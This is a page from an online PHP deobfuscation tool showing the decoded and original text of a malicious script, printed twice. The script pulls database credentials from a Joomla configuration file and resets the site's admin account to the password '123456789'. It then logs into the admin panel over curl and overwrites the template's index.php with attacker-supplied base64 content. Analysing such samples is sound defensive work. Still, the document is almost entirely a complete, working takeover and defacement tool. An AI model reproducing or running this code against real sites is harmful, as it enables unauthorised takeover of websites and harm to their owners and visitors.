Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function randomt(){$p229="abcdefghijkmnopqrstuvwxyz023456789";srand((double)microt..
Decoded Output download
<?php function randomt(){$p229="abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$t33=0;$g98='';while($t33<=7){$g230=rand()%33;$n231=substr($p229,$g230,1);$g98=$g98.$n231;$t33++;}return $g98;}function entre2v2($x41,$s232,$e233,$t33=1){$p234=explode($s232,$x41);$i235=explode($e233,$p234[$t33]);$j236=trim($i235[0]);return $j236;}if($_POST['form_action']){$x41=file_get_contents($_POST['file']);$j93=entre2v2($x41,"public $n17 = '","';");$j192=entre2v2($x41,"public $j192 = ', '","';");$j154=entre2v2($x41,"public $x237 = ', '","';");$y238=entre2v2($x41,"public $y238 = '","';");$f239=($_POST['site_url']);$l99="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";$z240=randomt();$z240=randomt();if($_POST['form_action']){$l99="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";$j57=mysql_connect("dzoed.druknet.bt",$j93,$j192);mysql_select_db($j154,$j57);$v241=mysql_query("UPDATE ".$y238."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");echo("<br>[+] Changing admin password to 123456789");$j242=mysql_query("SELECT * from `".$y238."extensions` ");if($j242){$j242=mysql_query("SELECT * from `".$y238."template_styles` WHERE client_id='0' and home='1'");$d79=mysql_fetch_array($j242);$n243=$d79["template"];$j242=mysql_query("SELECT * from `".$y238."extensions` WHERE name='".$n243."'");$d79=mysql_fetch_array($j242);$b244=$d79["extension_id"];$b245=$f239."/index.php";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,1);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$s249=entre2v2($n248,'<input type="hidden" name="return" value="','"');$z250=entre2v2($n248,'<input type="hidden" name="','" value="1"',4);$b245=$f239."/index.php";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_POST,1);curl_setopt($n246,CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$s249."&".$z250."=1");curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$e251=strpos($n248,"com_config");if($e251===false){echo("<br>[-] Login Error");exit;}else{echo("<br>[~] Login Successful");}$b245=$f239."/index.php?option=com_templates&task=source.edit&id=".base64_encode($b244.":index.php");$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$d252=entre2v2($n248,'<input type="hidden" name="','" value="1"',2);if($d252){echo("<br>[+] index.php file founded in Theme Editor");}else{echo("<br>[-] index.php Not found in Theme Editor");exit;}echo("<br>[*] Updating Index.php .....");$b245=$f239."/index.php?option=com_templates&layout=edit";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_POST,1);curl_setopt($n246,CURLOPT_POSTFIELDS,"jform[source]=".$l99."&jform[filename]=index.php&jform[extension_id]=".$b244."&".$d252."=1&task=source.save");curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$e251=strpos($n248,'<dd class="message message">');if($e251===false){echo("<br>[-] Updating Index.php Error");exit;}else{echo("<br>[~] index.php successfully saved");}}else{$j242=mysql_query("SELECT * from `".$y238."templates_menu` WHERE client_id='0'");$d79=mysql_fetch_array($j242);$n243=$d79["template"];$b245=$f239."/index.php";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,1);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$z250=entre2v2($n248,'<input type="hidden" name="','" value="1"',3);$b245=$f239."/index.php";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_POST,1);curl_setopt($n246,CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$z250."=1");curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$e251=strpos($n248,"com_config");if($e251===false){echo("<br>[-] Login Error");exit;}else{echo("<br>[+] Login Successful");}$b245=$f239."/index.php?option=com_templates&task=edit_source&client=0&id=".$n243;$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$d252=entre2v2($n248,'<input type="hidden" name="','" value="1"',6);if($d252){echo("<br>[~] index.php file founded in Theme Editor");}else{echo("<br>[-] index.php Not found in Theme Editor");}echo("<br>[*] Updating Index.php .....");$b245=$f239."/index.php?option=com_templates&layout=edit";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_POST,1);curl_setopt($n246,CURLOPT_POSTFIELDS,"filecontent=".$l99."&id=".$n243."&cid[]=".$n243."&".$d252."=1&task=save_source&client=0");curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$e251=strpos($n248,'<dd class="message message fade">');if($e251===false){echo("<br>[-] Updating Index.php Error");exit;}else{echo("<br>[~] index.php successfully saved");}}}function randomt(){$p229="abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$t33=0;$g98='';while($t33<=7){$g230=rand()%33;$n231=substr($p229,$g230,1);$g98=$g98.$n231;$t33++;}return $g98;}function entre2v2($x41,$s232,$e233,$t33=1){$p234=explode($s232,$x41);$i235=explode($e233,$p234[$t33]);$j236=trim($i235[0]);return $j236;}}?>
Did this file decode correctly?
Original Code
<?php function randomt(){$p229="abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$t33=0;$g98='';while($t33<=7){$g230=rand()%33;$n231=substr($p229,$g230,1);$g98=$g98.$n231;$t33++;}return $g98;}function entre2v2($x41,$s232,$e233,$t33=1){$p234=explode($s232,$x41);$i235=explode($e233,$p234[$t33]);$j236=trim($i235[0]);return $j236;}if($_POST['form_action']){$x41=file_get_contents($_POST['file']);$j93=entre2v2($x41,"public $n17 = '","';");$j192=entre2v2($x41,"public $j192 = ', '","';");$j154=entre2v2($x41,"public $x237 = ', '","';");$y238=entre2v2($x41,"public $y238 = '","';");$f239=($_POST['site_url']);$l99="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";$z240=randomt();$z240=randomt();if($_POST['form_action']){$l99="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";$j57=mysql_connect("dzoed.druknet.bt",$j93,$j192);mysql_select_db($j154,$j57);$v241=mysql_query("UPDATE ".$y238."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");echo("<br>[+] Changing admin password to 123456789");$j242=mysql_query("SELECT * from `".$y238."extensions` ");if($j242){$j242=mysql_query("SELECT * from `".$y238."template_styles` WHERE client_id='0' and home='1'");$d79=mysql_fetch_array($j242);$n243=$d79["template"];$j242=mysql_query("SELECT * from `".$y238."extensions` WHERE name='".$n243."'");$d79=mysql_fetch_array($j242);$b244=$d79["extension_id"];$b245=$f239."/index.php";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,1);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$s249=entre2v2($n248,'<input type="hidden" name="return" value="','"');$z250=entre2v2($n248,'<input type="hidden" name="','" value="1"',4);$b245=$f239."/index.php";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_POST,1);curl_setopt($n246,CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$s249."&".$z250."=1");curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$e251=strpos($n248,"com_config");if($e251===false){echo("<br>[-] Login Error");exit;}else{echo("<br>[~] Login Successful");}$b245=$f239."/index.php?option=com_templates&task=source.edit&id=".base64_encode($b244.":index.php");$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$d252=entre2v2($n248,'<input type="hidden" name="','" value="1"',2);if($d252){echo("<br>[+] index.php file founded in Theme Editor");}else{echo("<br>[-] index.php Not found in Theme Editor");exit;}echo("<br>[*] Updating Index.php .....");$b245=$f239."/index.php?option=com_templates&layout=edit";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_POST,1);curl_setopt($n246,CURLOPT_POSTFIELDS,"jform[source]=".$l99."&jform[filename]=index.php&jform[extension_id]=".$b244."&".$d252."=1&task=source.save");curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$e251=strpos($n248,'<dd class="message message">');if($e251===false){echo("<br>[-] Updating Index.php Error");exit;}else{echo("<br>[~] index.php successfully saved");}}else{$j242=mysql_query("SELECT * from `".$y238."templates_menu` WHERE client_id='0'");$d79=mysql_fetch_array($j242);$n243=$d79["template"];$b245=$f239."/index.php";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,1);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$z250=entre2v2($n248,'<input type="hidden" name="','" value="1"',3);$b245=$f239."/index.php";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_POST,1);curl_setopt($n246,CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$z250."=1");curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$e251=strpos($n248,"com_config");if($e251===false){echo("<br>[-] Login Error");exit;}else{echo("<br>[+] Login Successful");}$b245=$f239."/index.php?option=com_templates&task=edit_source&client=0&id=".$n243;$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$d252=entre2v2($n248,'<input type="hidden" name="','" value="1"',6);if($d252){echo("<br>[~] index.php file founded in Theme Editor");}else{echo("<br>[-] index.php Not found in Theme Editor");}echo("<br>[*] Updating Index.php .....");$b245=$f239."/index.php?option=com_templates&layout=edit";$n246=curl_init();curl_setopt($n246,CURLOPT_URL,$b245);curl_setopt($n246,CURLOPT_POST,1);curl_setopt($n246,CURLOPT_POSTFIELDS,"filecontent=".$l99."&id=".$n243."&cid[]=".$n243."&".$d252."=1&task=save_source&client=0");curl_setopt($n246,CURLOPT_FOLLOWLOCATION,1);curl_setopt($n246,CURLOPT_RETURNTRANSFER,1);curl_setopt($n246,CURLOPT_HEADER,0);curl_setopt($n246,CURLOPT_USERAGENT,$x247);curl_setopt($n246,CURLOPT_COOKIEJAR,$z240);curl_setopt($n246,CURLOPT_COOKIEFILE,$z240);$n248=curl_exec($n246);$e251=strpos($n248,'<dd class="message message fade">');if($e251===false){echo("<br>[-] Updating Index.php Error");exit;}else{echo("<br>[~] index.php successfully saved");}}}function randomt(){$p229="abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$t33=0;$g98='';while($t33<=7){$g230=rand()%33;$n231=substr($p229,$g230,1);$g98=$g98.$n231;$t33++;}return $g98;}function entre2v2($x41,$s232,$e233,$t33=1){$p234=explode($s232,$x41);$i235=explode($e233,$p234[$t33]);$j236=trim($i235[0]);return $j236;}}?>
Function Calls
explode | 1 |
entre2v2 | 1 |
file_get_contents | 1 |
Stats
MD5 | e13e227a30cb95704a9800d566c7b646 |
Eval Count | 0 |
Decode Time | 362 ms |